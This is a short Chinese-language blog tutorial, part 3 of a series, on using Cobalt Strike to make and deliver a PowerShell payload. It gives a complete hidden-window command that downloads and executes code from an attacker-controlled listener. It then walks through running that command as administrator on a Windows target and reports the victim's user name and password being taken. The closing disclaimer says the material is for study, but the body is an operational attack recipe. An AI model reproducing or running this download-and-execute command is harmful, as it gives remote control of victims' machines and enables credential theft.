Cobalt strike tools use (3)

续:https://www.freearoot.com/index.php/cobalt-strike-tools-use-2.html


进入主题

Cobalt-strike生成Powershell生成Payload进行攻击演示:

启动Cobalt-strike

监听

这里我就不多说了,请看点击

生成Powershell payload

1.端口请勿与其他服务冲突

2.如果不是公网本地IP,目标机器和服务端机器的IP一定要在一个网段上,才能实现攻击.

3.如果你是公网本地IP,直接与能链接外网的目标机器执行Powershell payload即可

完成Payload生成我们会得到一个Powershell payload执行代码

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.161.130:10011/a'))"

接下来我们来到Windows服务器,并以管理员权限运行Powershell,执行payload代码

我们回到kali linux中的Cobalt-strike主界面会发现主机已经上线了

我们进行对目标远程获取信息

成功获取目标信息

当前操作系统用户名:A#root

当前操作系统用户密码:freearoot123..

以及当前系统基本信息


本教程软件工具来源于网络仅为个人学习测试使用,请在下载后24小时内删除,请遵守国家法律法规,不得恶意滥用进行非法用途,否则后果自负.


转载请注明出处: https://www.freearoot.com/index.php/cobalt-strike-tools-use-3.html